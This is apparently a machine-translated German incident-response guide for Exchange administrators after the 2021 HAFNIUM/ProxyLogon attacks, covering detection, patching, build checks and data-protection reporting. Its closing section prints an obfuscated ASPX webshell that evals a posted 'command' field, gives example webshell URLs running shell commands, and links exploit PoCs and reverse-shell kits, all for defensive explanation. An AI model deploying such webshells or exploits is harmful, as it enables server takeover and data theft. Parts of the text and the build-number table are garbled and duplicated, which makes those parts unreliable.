Sie sollten die Protokolle ab dem 2

März im ersten Durchgang durchsuchen

Aber eine Suche seit Nov 2020 ist ratsam

EOMT – Exchange On-premises Mitigation Tool Auch hier handelt es sich in erster Linie um ein PowerShell-Skript, das den ausgenutzten Angriffsvektor per URL-Rewrite verhindert, aber kein Ersatz für das Update ist

Er führt auch verschiedene Tests und Scans durch und macht Änderungen bei Angriffen rückgängig

Das Tool kann nur die Malware erkennen, die Microsoft hinterlegt hat

Das war in der ersten Woche der Angriffe sehr hilfreich, aber die Payload ist mittlerweile sehr variabel und aus meiner Sicht ist EOMT nur der erste Bestandteil einer Analyse

Herunterladen

https://aka.ms/eomt One-Click Microsoft Exchange On-Premises Mitigation Tool – März 2021

https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on -Premises-Mitigation-Tool-März-2021/ Virenscanner von Drittanbietern Sie verhindern normalerweise keinen Einbruch, können aber viele “unerwünschte Programme” erkennen, die vom Angreifer abgelegt wurden

Überprüfen Sie das Protokoll dieser Scanner auf allen Servern und überprüfen Sie die Ausschlusslisten, damit “fast” alles gescannt wird

Auch der Ruf des Virenscanners hat stark gelitten, da die oft versprochene „Verhaltenserkennung“ keine Schreibzugriffe auf Webserver-Verzeichnisse erkennt und eine WebShell aus dem Jahr 2012 durch keine Pattern-Datei verhindert wurde

Was passiert eigentlich im Hinblick auf die Produkthaftung, wenn der Airbag bei einem Autounfall nicht auslöst? Mit dem Ergebnis können Sie dann Ihre Entscheidung treffen

Wenn Ihr Server glücklicherweise noch nicht infiziert wurde, sollten Sie sofort patchen und froh sein, dass Sie glimpflich davongekommen sind

Aber wenn es “Treffer” gibt, dann hat sich höchstwahrscheinlich eine unbekannte Institution oder Person auf Ihren Server bewegt, Dateien hochgeladen und Befehle per Webshell gesendet

Das wird wohl kein neugieriger Besucher gewesen sein, der allein gegangen ist

Es könnte sogar noch aktiv sein, wenn Sie den Zugriff nicht gut genug blockiert haben.

Das BSI scanne nach solchen Servern und kontaktiere die Anbieter wegen der IP-Adressen, damit diese den Kunden ansprechen können

Wenn ich also den Domainnamen eines Exchange-Servers kenne, dann sollte es möglich sein, den „Kunden“ zu identifizieren und schnell zu kommunizieren

Es wäre wohl strafbar, den Server „aus Sicherheitsgründen“ per Webshell aus der Ferne herunterzufahren

HAFNIUM zielt auf Exchange-Server mit 0-Day-Exploits – Kann ich feststellen, ob ich durch diese Aktivität kompromittiert wurde?

HAFNIUM targeting Exchange Servers with 0-day exploits

Sicherheitsskripte

https://github.com/microsoft/CSS-Exchange/tree/main/Security

Mehr Skripte

Entsprechende Erkennungen hat Microsoft auch in das Produkt „Microsoft Defender for Endpoint“ eingebaut

Wenn Sie Ihren Exchange-Server mit diesem AV-Scanner ausgestattet haben, dann sollte dieser auch Infektionen erkennen und verhindern, zumindest solange die Angreifer ihre Methoden nicht ändern

Das ist also nicht unbedingt sicher

Andere AV-Scanner von Drittanbietern werden sicherlich bald auch solche Dateien finden

Natürlich wirft es ein schlechtes Licht auf diese „Schutz“-Produkte, wenn 2021 kein einziger Hersteller Malware in Form einer Web-Shell entdeckt, die bereits 2012 bei Angriffen zum Einsatz kam

Wenn wir nun davon ausgehen, dass sie entweder noch nicht betroffen sind oder deren Analyse und Risikobewertung den Weiterbetrieb ihres Netzwerks und Active Directory als “tolerierbares Restrisiko” bezeichnet, dann ist es an der Zeit, die Updates einzuspielen

Egal, ob sie bereits betroffen sind oder nicht: Niemand soll eingreifen mit dem Update

Deshalb: Zugriff verhindern, IIS beenden

Wann immer möglich, sollten Sie die Dienstunterbrechung nutzen, um den Server direkt zu aktualisieren

Nur in wenigen Ausnahmen ist dies nicht möglich, z

wenn Ihr Forest Functional Level nicht angehoben werden konnte

Sie sollten auch das Sicherheitsupdate “KB5000978” über “Windows Update” sehen

Möglicherweise muss Ihr WSUS-Administrator das Update zuerst freigeben

Wenn der Server nicht auf das Internet zugreifen kann, können Sie die Updates auch selbst herunterladen

Aktion Versionsermittlung prüfen Prüfen Sie die aktuelle Version Ihres Exchange-Servers

Entscheiden Sie, ob Sie die aktuelle CU mit dem Sicherheitspatch sichern oder zuerst die CU aktualisieren möchten

Sie müssen die neuste CU nicht mehr vorher installieren, da auch für einige ältere CUs entsprechende Updates verfügbar sind

Wenn Sie jedoch später ein neueres CU installieren, das bereits veröffentlicht wurde, müssen Sie trotzdem die entsprechenden Sicherheitsupdates installieren

Ein CU-Update dauert jedoch länger und kann andere Abhängigkeiten (.NET Framework, AD ForestMode usw.) aufweisen, die den Vorgang verzögern

März 2021 Exchange Server-Sicherheitsupdates für ältere kumulative Updates von Exchange Server

https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020#comment-on-this Laden Sie die entsprechende one Updates Die Links finden Sie im folgenden Artikel

KB-Artikel mit direkten Links zu allen Updates

https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871- 9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b Neustart vor Update Microsoft empfiehlt dringend einen Neustart vor der Installation

Es ist durchaus möglich, dass auch nach dem Schließen der Exchange-Dienste noch Dateien blockiert sind und das Update daher fehlschlägt

Installation des Sicherheitsupdates Das Sicherheitsupdate patcht nur die Lücken, aber keine anderen Komponenten

So ist es relativ schnell erledigt

Die Dauer der Installation hängt von der Leistung Ihres Servers ab

Während dieser Zeit ist der Server für Benutzer nicht erreichbar, da die Dienste zu Beginn beendet und erst am Ende neu gestartet werden

Wenn Sie einen Cluster (DAG) haben, können Sie die Knoten nacheinander offline nehmen

Wenn der Exchange Server erst auf den aktuellen CU/RU-Stand aktualisiert werden muss, dann sollten Sie die Abhängigkeiten zum. NET Framework beachten

Sie können jedoch direkt zur neuesten Version wechseln, wenn Sie einige Voraussetzungen beachten

Hinweis mit UAC:

Starten Sie das Update immer aus einer administrativen CMD-Shell, damit das Update die Dienste stoppen kann

Andernfalls schlägt die Installation fehl! Aufmerksamkeit:

Es gibt erste Gerüchte, dass Angreifer die Vererbung auf das Verzeichnis OWA\AUTH deaktivieren, sodass das CU-Update mit Fehler 1603 abbricht

https://docs.microsoft.com/en-us/answers/questions/304724/exchange-2019-cu8- upgrade-fehlgeschlagen-unzureichend-priv.html

https://docs.microsoft.com/en-us/answers/questions/307762/cu-update-install-failing-with-error-1603.html#answer-313033

Überprüfen Sie dann das Verzeichnis “C:\Programme\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\15.0.1497”

Normalerweise ist dies “Administrators:Full, SYSTEM:Full” und die Vererbung ist aktiv

Checkliste für Exchange 2016-Updates

Austausch direktes Update

Exchange-Updates und. NET Service Packs

Reparieren Sie fehlgeschlagene Installationen von kumulativen und Sicherheitsupdates für Exchange

https://docs.microsoft.com/en-us/exchange/troubleshoot/client-connectivity/exchange-security-update-issues

https://docs.microsoft.com/en-us/exchange/troubleshoot/client-connectivity/exchange-security-update-issues Stellen Sie Exchange-Server wieder her

https://docs.microsoft.com/en-us/exchange/high-availability/disaster-recovery/recover-exchange-servers Neustart des Servers Das Sicherheitsupdate fordert nicht immer aktiv einen Neustart an

Aber es ist erforderlich

Danach sollte Ihr Server “geschützt” sein

Wenn Sie auch die externe Verbindung blockiert haben, sollte auch der Angreifer keinen Zugriff mehr haben

Leider können Sie nicht einfach mit PowerShell feststellen, ob der Patch installiert ist oder nicht

Für mich gibt die folgende Zeile immer noch 2176,2 statt 2176,9 zurück

Mit dem Juli 2021 Security Update hat Microsoft endlich eine offizielle Möglichkeit veröffentlicht, die aktuell installierte Version zu ermitteln

Siehe Verifizierung am Patchday Juli 2021

Beachten Sie auch Ermitteln der Exchange-Build-Nummer

# Diese Abfrage liefert keine ausführlichen Informationen [PS] C:\>Get-ExchangeServer | Name der Formatliste, Edition, AdminDisplayVersionsname : EX16 Edition : Standard AdminDisplayVersion : Version 15.1 (Build 2176.2)

Ich bekomme die gleiche Antwort mit einer “probe” via invoke web request (PowerShell 7.1 erforderlich für die “-Skip”-Parameter):

$owalogin=(Invoke-WebRequest https://owa.netatwork.de/owa/auth/logon.aspx -SkipHttpErrorCheck -SkipCertificateCheck) $owalogin.Content.Substring($owalogin.Content.IndexOf(‘

Selbst die Überprüfung des SMTP-Headers einer E-Mail liefert keine Informationen.

Erhalten: von hybrid.msxfaq.de (192.168.80.3) von hybrid.msxfaq.de (192.168.80.3) mit Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256) id 15.1.2176.2 ; So, 07.03.2021 22:29:42 +0100 Empfangen: von EUR05-DB8-obe.outbound.protection.outlook.com (104.47.17.110) von hybrid.msxfaq.de (192.168.80.3) mit Microsoft SMTP Server (Version =TLS1_2, Chiffre=TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256) ID 15.1.2176.2 über Front-End-Transport; Sonntag, 07

März 2021 22:29:42 +0100

Der Transport wurde durch die Updates nicht aktualisiert, daher hat ihr Server jetzt andere Build-Nummern

Ich sehe nur die Hauptversion, die nur Rückschlüsse auf die installierte CU zulässt

Trotzdem ein einfacher Test um “zu alte” CUs zu identifizieren und wird sicherlich auch extern geprüft

Erst ein Blick auf die OWA-Struktur oder unter “Systemsteuerung – Programme – Updates” zeigt die neuere Installation:

Version 15.1.2176.4 ist CU19, 15.1.2176.4 ist das Sicherheitsupdate KB4602269 vom Feb 2021 und nur 15.1.2176.9 ist das wichtige Update

Sie können sehen, dass ich das Update auf 3.3 sofort installiert habe

Die folgenden Build-Nummern beschreiben die Version mit installiertem Patch:

Die am 16

März veröffentlichten Vollinstallationen Exchange 2019 CU9 und Exchange 2016 CU20 enthalten das Sicherheitsupdate

Alle vorherigen Versionen müssen aktualisiert werden

Wechsel 2019 2016 2013 2010 SP3 Aktuelle CU9: 15.2.858.5 CU20: 15.1.2242.4 N-0 CU8: 15.2.792.10 CU19: 15.1.2176.9 CU23: 15.0.1497.12 RU32.5: 14.032.5 1 CU7: 15.2.721.13 CU18: 15.1.2106.13 CU22: 15.0.1473.6 N-2 CU6: 15.2.659.12 CU17: 15.1.2044.13 CU21: 15.0.1395.12 N-3 CU5: 15.0.1395.12 N-3 CU5: 91.7.8.5. 31.9.595.8 CU : 15.1.1913.12 N-4 CU3: 15.2.464.15 CU14: 15.1.1847.12 N-5 CU2: 15.2.397.11 CU13: 15.1.1779.8 N-6 CU1: 15.2.1779.8 N-6 CU1: 15.2.4.64.131 N.2.4.64.13 11-6 RTM: 15.2.221.18 CU11: 15.1.1591.18 N-7 CU10: 15.1.1531.12 N-8 CU09: 15.1.1466.16 N-9 CU08: 15.1.1415.10

Microsoft würde keine Updates für diese sehr alten CU-Versionen veröffentlichen, wenn es nicht Kunden mit dieser Basis gäbe

Aus meiner Sicht ist es sehr erschreckend, dass seit Jahren keine Updates und Bugfixes mehr installiert wurden

Überprüfen Sie besser, ob das Update installiert ist

Ich hatte bereits Kundenserver mit CU19 drauf und am 3

März war „nur“ das Security Update Feb 2021 (KB4602269) installiert

Irreführende Ausgabe

Neueste Version am 3.3

war nicht die richtigen Updates

Also genau hinschauen

Leider kann ich mit “Get-Hotfix” nur Windows-Betriebssystem-Updates abfragen und keine Exchange-Updates

Alternativ kann ein Blick in die Datei “C:\ExchangeSetupLogs\UpdateCas.log” den aktuellen Status zeigen:

[02:43:17] ****************************************** * **** [02:43:18] * UpdateCas.ps1: 03.03.2021 02:43:18 [02:43:24] Aktualisieren von OWA/ECP auf Server EX16 [02:43:24] Finden der ClientAccess-Rolleninstallation Pfad auf dem Dateisystem [02:43:25] FixUnversionedFolderAfterUpgrade: Gefundene Quellversionen: 15.1.2176.2 15.1.2176.4 [02:43:25] FixUnversionedFolderAfterUpgrade: Recovering files from ‘C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess \ Owa\prem\15.1.2176.2’ nach ‘C:\Programme\Microsoft\Exchange Server\V15\ClientAccess\Owa\Current2\version’ wo nötig [02:43:57] FixUnversionedFolderAfterUpgrade success [02:43:57] Aktualisierung der owin:AutomaticAppStartup-Bindungsumleitung auf „true“ [02:43:57] Aktualisierung der owa-Handler [02:43:57] Die Datei „Web.config“ hatte bereits einen Knoten für: userbootsettings.ashx [02:43:57] Die Datei „Web.config“ hatte bereits einen Knoten hatte einen Knoten für: MeetingPollHandler.ashx [02:43:58] Aktualisierung der Microsoft.Owin-Bindungsumleitung [02:43:58] Aktualisierung der Microsoft.Owin.Security-Bindungsumleitung [02:43:58] Trying t oa dd client common module to Web.config file [02:43:58] Aktualisieren von OWA auf Version 15.1.2176.9 [02:43:58] Kopieren von Dateien aus „C:\Programme\Microsoft\Exchange Server\V15\ClientAccess\ owa \Current’ nach ‘C:\Programme\Microsoft\Exchange Server\V15\ClientAccess\owa\15.1.2176.9’ [02:43:58] Update OWA fertig

[02:43:58] Aktualisieren von OWA auf Version 15.1.2176.9 [02:43:58] Kopieren von Dateien von „C:\Programme\Microsoft\Exchange Server\V15\ClientAccess\owa\Current2\version“ nach „C: \Programme\Microsoft\Exchange Server\V15\ClientAccess\owa\prem\15.1.2176.9′ [22:45:27] Update OWA fertig

[22:45:28] Aktualisieren von ECP auf Version 15.1.2176.9 [22:45:28] Kopieren von Dateien von „C:\Programme\Microsoft\Exchange Server\V15\ClientAccess\ecp\Current“ nach „C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\15.1.2176.9′ [22:45:30] Update ECP done.

Leider “entfernt” Microsoft die Vorgängerversionen von OWA bei der Installation eines Updates nicht, da dies der Fall ist Es kann immer noch “Backend-Server” mit älteren Versionen geben

Das ist aber kein Problem, wenn alle Server auf dem neusten Stand sind

Aufmerksamkeit:

Auch nach der Installation der Updates sind Ihre Server geschützt, aber bösartiger Code könnte immer noch aktiv sein

Ein erneuter Scan mit MSERT etc

ist wichtig und sollte auch wiederholt werden

Damit kommen wir in Richtung „sicherer Betrieb“

Wenn Sie sowieso auf dem Server arbeiten, können Sie den HealthChecker erneut ausführen_

https://github.com/dpaulson45/HealthChecker/releases

Stellen Sie sich vor, Sie haben eine PowerShell auf einem Server mit „LocalSystem“ und „ExchangeTrustedSubsystem“ in einem fremden Netzwerk und Sie haben kriminelle Energie

Was konnten sie tun? Ziemlich viel und auf ziemlich vielen Servern

Es reicht nicht aus, den Server zu patchen und erkannte Webshells zu entfernen

Sie wissen nicht genau, was der Angreifer sonst noch getan hat

Welche Befehle wurden über die Webshell ausgeführt?

Möglicherweise finden Sie diese als Parameter im IISLog

Exchange-Cmdlets werden im Ereignisprotokoll der Exchange-Verwaltung protokolliert

Sie finden diese möglicherweise im IISLog als Parameter

Exchange-Cmdlets werden im Ereignisprotokoll der Exchange-Verwaltung protokolliert

Remote-Shell

Wenn es dem Angreifer aber auch gelänge, eine RemoteShell zu starten, die auch eine ausgehende Verbindung aufbauen könnte, dann wäre es schwierig

Möglicherweise finden Sie auf der Firewall Anzeichen für ungewöhnliche ausgehende TCP-Verbindungen vom Exchange-Server

Die Shell kann aber auch HTTPS oder UDP verwenden

Wenn es dem Angreifer aber auch gelänge, eine RemoteShell zu starten, die auch eine ausgehende Verbindung aufbauen könnte, dann wäre es schwierig

Möglicherweise finden Sie auf der Firewall Anzeichen für ungewöhnliche ausgehende TCP-Verbindungen vom Exchange-Server

Die Shell kann auch HTTPS oder UDP verwenden

Zugriff auf andere Server

PowerShell und ohnehin auf Servern verfügbare Tools (WMIC.EXE etc.) sind nicht auf lokale Server beschränkt

Jedes andere System in Ihrem LAN ist möglicherweise betroffen

Wie gut war das Passwort auf Ihrer Firewall, auf Ihrem NAS? PowerShell und ohnehin auf Servern verfügbare Tools (WMIC.EXE etc.) sind nicht auf lokale Server beschränkt

Jedes andere System in Ihrem LAN ist möglicherweise betroffen

Wie gut war das Passwort auf Ihrer Firewall, auf Ihrem NAS? Exchange-Server

Sie müssen überhaupt nicht weit gehen

Wenn der Angreifer Ihre Exchange-Konfiguration geändert hat, um nach dem Sicherheitsupdate weiterhin Zugriff zu haben, hilft nur die Suche

Er hätte einen Dump von LSASS ableiten und so weitere Anmeldeinformationen erhalten können

Auch ein Keylogger als Treiber oder ein Proxy-Server, der ein eigenes Root-Zertifikat installiert, um SSL zu brechen, ist denkbar oder eine “geplante Aufgabe”, die irgendwann in der Zukunft zuschlagen wird.

Sie müssen nicht weit gehen

Wenn der Angreifer Ihre Exchange-Konfiguration geändert hat, um nach dem Sicherheitsupdate weiterhin Zugriff zu haben, hilft nur die Suche

Er hätte einen Dump von LSASS ableiten und so weitere Anmeldeinformationen erhalten können

Auch ein Keylogger als Treiber oder ein Proxy-Server, der ein eigenes Root-Zertifikat installiert, um SSL zu brechen, ist denkbar oder eine “geplante Aufgabe”, die irgendwann in der Zukunft zuschlagen wird

Active Directory

Welche Objekte wurden neu angelegt, welche Gruppenmitgliedschaften haben sich geändert oder welche Berechtigungen wurden erweitert, die Sie sich nicht erklären können? Welche Objekte wurden neu angelegt, welche Gruppenmitgliedschaften haben sich geändert oder welche Berechtigungen wurden erweitert, die Sie sich nicht erklären können? Protokollierung

Auf jeden Fall sollten sie in naher Zukunft das Logging ihrer Systeme erhöhen und nicht nur genauer hinhören

Aber das hättest du schon lange machen sollen

Ohne Prüfung der hoffentlich vorhandenen Logs sind keine Aussagen möglich und selbst dann bleibt immer ein Restrisiko

Eigentlich muss das gesamte System als kompromittiert angesehen werden

Eine allgemein gültige Empfehlung kann es nicht geben, da Sie nicht wissen, wie tief der Angriff war und welche „Hinterlassenschaften“ in Ihrem System zu finden sind

Dies ist umso wahrscheinlicher, je später Sie Ihr System gepatcht haben

haben

Ich möchte keine Panik auslösen, aber solche Angriffe sind automatisiert und per Skript ausgeführt

Es ist daher wahrscheinlich, dass alle betroffenen Systeme ähnlichen Aktionen unterzogen wurden, wie sie im folgenden Video dargestellt werden

Analyse – Nachnutzung von Microsoft Exchange HAFNIUM

Analyse eines Exchange-Servers und was die Angreifer über WebShell hätten anstellen können

Es bleibt also ein Restrisiko, ob Sie die bestehende Installation einfach reparieren und weiter betreiben, oder ob Sie tatsächlich einen kompletten Neuaufbau Ihres Forests (Greenfield )

Für den zweiten Schritt braucht man allerdings viele Hände und ein sehr gutes Argument gegenüber dem Firmeninhaber bezüglich der Kosten

Der Weiterbetrieb der vielleicht geheilten Umgebung ist jedoch mit zusätzlichen Kosten verbunden

Zuerst würde ich alle Passwörter ändern und einen KRBTGT-Key-Rollover durchführen

Außerdem sollen sie die Sicherheit deutlich erhöhen, Virenscanner auf ausnahmslos jedem Server und Firewalls, Prozesse, Netzwerkverkehr etc

überwachen, um mögliche interne Malware zu erkennen

Niemand kann Ihnen einen Freibrief ausstellen, dass Ihr gesamtes System nach einer „Säuberung“ mit MSERT sicher weiter betrieben werden darf

Aber das konnte vorher niemand

Sicherheit ist kein Zustand, sondern ein Prozess.

Für manche Unternehmen wird eine solche Infektion auch ein Weckruf sein, Berechtigungen genauer zu vergeben, die Rolle von Domänenadministratoren auf notwendige Aktionen zu reduzieren, Firewalls „strenger“ zu setzen, Sicherheitspatches schneller zu installieren und das Thema generell zu erweitern Protokollierung

Das bedeutet wiederum Gespräche mit Betriebsräten und Datenschutzbeauftragten

Denn jedes Log kann auch missbraucht werden

Bitte beachten Sie auch die Hafnium-Nachbearbeitungsseite

Aber es gibt noch einen weiteren Aspekt: ​​Angenommen, Ihr Unternehmen war ein Ziel, dann könnten auch E-Mails, Kontakte und Termine von Benutzern umgeleitet worden sein und nun im Besitz des Angreifers sein

Risiko\Pflichten Beispiel Internet-Dokumentationspflicht

Art 33 Abs 5 DS-DVO Meldepflicht gegenüber der Aufsichtsbehörde

Art 33 Abs

1 DS-DVO Meldepflicht gegenüber Personen

Art 34 Abs 1 DS-DVO Kein oder risikoarmer OAB-Zugriff Ja! Nein Nein Risiko Export von Postfächern, Export großer Datenmengen Ja! Jawohl! Nein Daten mit hohem Risiko enthalten auch Kundendaten, Passwort Ja! Jawohl! Jawohl!

IT-Dienstleister und Auftragsdatenverarbeiter müssen ihren Kunden ggf

weitere Informationspflichten erfüllen

Vom „Bayerischen Landesamt für Datenschutzaufsicht“ gibt es zumindest eine Handreichung vom 09.03.2021

Bei bisher untätig gebliebenen Unternehmen (09.03.2021, Frank Carius) gehen wir von einem Datenschutzverstoß aus, der muss gemeldet werden, diese Aufgabe noch nicht erfüllt haben,. ….unabhängig von weiteren Erkenntnissen sind sie verpflichtet, die Sicherheitslücke innerhalb von 72 Stunden als Schutzverletzung zu melden hat 16.502 bayerische Systeme auf ihre mögliche Schwachstelle untersucht

…im ersten Testlauf wurde eine dreistellige Zahl potenziell angreifbarer Server identifiziert…

…nach Information der Unternehmen will das BayLDA weitere Testläufe durchführen…

Quelle: Bayern Landesamt für Datenschutzaufsicht : Sicherheitslücken bei Microsoft Exchange Mailservern: Akuter Handlungsbedarf für bayerische Unternehmen – BayLDA empfiehlt: Patchen, prüfen, melden! –

https://www.lda.bayern.de/media/pm/pm2021_01.pdf

Sie können natürlich Glück haben, dass Sie nicht betroffen sind oder die Einbrecher nichts mitgenommen haben

Aber wenn Sie es nicht genau wissen und die Täter in ein paar Wochen ein paar Bitcoins verlangen, dann ist die Meldefrist von 72 Stunden längst abgelaufen

Als Verwalter sollten Sie auch sofort die Anwälte und die Geschäftsführung einbeziehen

Viele Unternehmen haben heute auch eine „Cyber-Versicherung“, die aber oft nur dann gilt, wenn man auch eine Strafanzeige bei der Polizei erstattet

Hier müssen Sie die Versicherung einschalten

Dann kann es aber passieren, dass das „Aufräumen“ des Servers eine Veränderung des „Tatorts“ bedeutet, die womöglich noch gar nicht veröffentlicht wurde

Hier lauern viele Fallstricke -microsoft-exchange-ser/ BaWü https://www.baden-wuerttemberg.datenschutz.de/aktiv-ausutilization-der-microsoft-exchange-schwachstelle/

https://www.baden-wuerttemberg.datenschutz.de/datenpanne-melden/ NRW https://www.ldi.nrw.de/mainmenu_Aktuelles/ Inhalt/Sicherheitsluecken-bei-Microsoft-Exchange-Mail-Servern/Sicherheitsluecken-bei -Microsoft-Exchange-Mail-Servern.html HH https://datenschutz-hamburg.de/pages/microsoft-exchange/ BAY https://www.lda.bayern.de/de/thema_exchange_Sicherheitsluecke.html Berlin Keine Informationen zu Exchange (Stand 19

März 2021)

https://www.datenschutz-berlin.de/wirtschaft-und-verwaltung/meldung-einer-datenpanne NI kompromittierter Exchange Server meldepflichtig

https://lfd.niedersachsen.de/startseite/themen/wirtschaft/kompromittierte-exchange-server-meldepflicht-198287.html

https://lfd.niedersachsen.de/startseite/themen/wirtschaft/kompromittierte-exchange-server-meldepflicht-198287.html zur_proxylogon_Sicherheitslucke_auf_microsoft_exchange_servern/proxylogon-Sicherheitslucke-auf-microsoft-exchange-servern-198578.html Hessen https://datenschutz. hessen.de/pressemitteilungen/sofortige-aktionspflicht-wegen-flags-in-microsoft-exchange-server Bund / BSI Kritische Schwachstellen in Exchange-Servern

https://www.bsi.bund.de/DE/Themen/Unternahmen-und-Organisationen/Information-und-Empfehlungen/Empfehlungen-nach-Attackszielen/Server/Microsoft-Exchange_Schwachstelle/schwachstelle_exchange_server_node.html

https://www.bsi.bund.de/DE/Themen/Unternahmen-und-Organisationen/Information-und-Empfehlungen/Empfehlungen-nach-Attackszielen/Server/Microsoft-Exchange_Schwachstelle/schwachstelle_exchange_server_node.html Mehrere Schwachstellen in MS Exchange

https://www.bsi.bund.de/SharedDocs/CyberSicherheitswarningen/DE/2021/2021-197772-1132.pdf

https://www.bsi.bund.de/SharedDocs/CyberSicherheitswarningen/DE/2021/2021-197772-1132.pdf Microsoft Exchange Schwachstellen – Erkennung und Reaktion

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachtstellen-2021/MSExchange_Schwachtstelle_Detection_Reaction.pdf

Wer einen betroffenen Server hat und sich noch nicht gemeldet hat, dem droht je nach Land ein Bußgeld

Auf dieser Seite habe ich mehrfach den Begriff „Webshell“ erwähnt, ohne die Grundfunktion zu beschreiben

Webserver liefern nicht nur statische Dateien, sondern können auch Seiten im Moment des Zugriffs „berechnen“

Jede PHP-Seite ist ein gutes Beispiel dafür

Auf einem Exchange Server übernimmt der IIS diese Funktion und ASP oder neuere ASPX sind entsprechende Dateien

Parameter werden normalerweise als Teil der URL übergeben

Ich muss eine Datei in folgender Form auf Ihrem Webserver ablegen oder eine vorhandene Datei mit dieser Funktion “erweitern”:

Diese Seite kann ich dann einfach remote per Browser aufrufen, um eine Datei “filename” mit dem Inhalt “file content” zu schreiben: https://server.msxfaq.de/aspxuploader.aspx?fname=.\filename&fdata=file content

Interessanter ist es aber, beliebige Programme mit privilegierten Rechten zu starten

Noch schneller geht das, wenn der Code mit einem Exploit in eine Webseite eingeschleust wurde

In diesem Fall muss ich den auszuführenden Befehl als “feldname” übergeben

https://server.msxfaq.de/aspxshell.aspx?fe ldname= cmd /c dir

Wie Sie sehen, ist der Code sehr einfach zu ändern

Wenn die ASPX-Seite etwas komplexer ist, kann ich direkt mehr Befehle in die ASPX-Seite einbauen, die ich nur steuern muss

Auf diese Weise kann ich der Angreifer kann auch komplette PowerShell-Skripte „übertragen“ und ausführen, zusätzliche Tools herunterladen und diese dann weiter ausführen, Malware wird die ASPX-Seite aber sicher nicht so „lesbar“ ablegen, sondern „verstecken“

viele Möglichkeiten, angefangen bei geänderten Variablennamen, gesplitteten Strings und Parametern, die erst dann wieder zusammengesetzt werden, z

Quelle https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html <%@ Page Language="Jscript" Debug =true%> <% var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJjb21tYW5kIl0=")); var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl")); var c=eval(a,b); eval(c,b); %>

Die Schreibweisen können endlos variiert werden, sodass musterbasierte Scans diese Dateien in der Regel nicht mehr erkennen

Aber das ist erst der Anfang

Interessant wird es nun, wenn ich statt der ASPX-Datei ein Skript auf dem Server starte, das eine Verbindung zu meinem eigenen Server herstellt und auf Eingaben wartet

Diese gibt es auch als fertige Module, z.B

B

nishang (https://github.com/samratashok/nishang/tree/master/Shells) und andere Tools samt Anleitung, wie diese Skripte „InMemory“ ausgeführt werden können und damit einem normalen „dateibasierten“ Virenscanner verborgen bleiben

Als Angreifer muss ich dann nur noch einem Rechner eine vom Zielsystem ansprechbare IP-Adresse zuweisen und auf eingehende Verbindungen warten

Die Remote-Shell startet und verbindet sich über TCP, HTTP, WMI, UDP und andere Protokolle mit der Konsole des Angreifers

WebShells eignen sich hervorragend zum Ausführen von Remote-Code, wenn ich den Server beispielsweise über HTTP erreichen kann und kein URL-Inhalt geprüft wird

Kann der Server auch ausgehend kommunizieren, dann wird der Angreifer sehr schnell auf eine RemoteShell umstellen, denn dann sehen Sie die Anfragen nicht mehr im IISLog und auch der Webserver-Timeout hindert Sie nicht daran

Exploit Sample Code (Python )

https://github.com/vanhauser-thc/CVE-2021-26855/blob/main/PoC_proxyLogon.py

https://github.com/vanhauser-thc/CVE-2021-26855/blob/main/PoC_proxyLogon.py PoC_CVE-2021-28482.py

https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda

https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bdasamratashok/nishang

https://github.com/samratashok/nishang/tree/master/Shells

Nishang ist ein Framework und eine Sammlung von Skripten und Payloads, die die Verwendung von PowerShell für offensive Sicherheit, Penetrationstests und Red Teaming ermöglichen

Nishang ist in allen Phasen von Penetrationstests nützlich rotes Teaming

Nishang ist in allen Phasen des Penetrationstests nützlich

PowerSploit (wird nicht mehr aktiv gepflegt)

https://github.com/PowerShellMafia/PowerSploit/

“PowerSploit ist eine Sammlung von Microsoft PowerShell-Modulen, die verwendet werden können, um Penetrationstester in allen Phasen einer Bewertung zu unterstützen.”

https://github.com/PowerShellMafia/PowerSploit/ “PowerSploit ist eine Sammlung von Microsoft PowerShell-Modulen, die verwendet werden können, um Penetrationstester in allen Phasen einer Bewertung zu unterstützen.” Webshell-Beispiele

https://github.com/ysrc/webshell-sample

https://github.com/ysrc/webshell-sample JavaScript: eval()

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval Cert-LV: Erkennung von Webshells, die nach 0day-Kompromittierungen auf Microsoft Exchange-Servern abgelegt wurden

https://github.com/cert-lv/exchange_webshell_detection

https://github.com/cert-lv/exchange_webshell_detection Tracking von Microsoft Exchange Zero-Day ProxyLogon und HAFNIUM

https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/

https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/ GitHub: Suchen Sie nach CVE-Beispielen

https://github.com/search?q=CVE&type=repositories

Softwarefehler in einem Produkt können Sie nicht generell verhindern und es wird sie auch in Zukunft immer geben

Aber es gibt mehrere Phasen zwischen dem Finden eines Fehlers und dem Ausnutzen des Fehlers, um eine andere Maßnahme zu ergreifen

Schadcode verwendet häufig dieselben Techniken, die wir bereits von anderen Prozessen kennen

Insbesondere JavaScript für eine WebShell oder ähnliches wird oft recycelt und Microsoft hat mehrere “Merkmale” darüber veröffentlicht:

Script/Exmann.A!dha Verhalten:Win32/Exmann.A Backdoor:ASP/SecChecker.A Backdoor:JS/Webshell (nicht eindeutig) Trojan:JS/Chopper!dha (nicht eindeutig) Verhalten:Win32/DumpLsass.A!attk (nicht eindeutig) Backdoor:HTML/TwoFaceVar.B (nicht eindeutig)

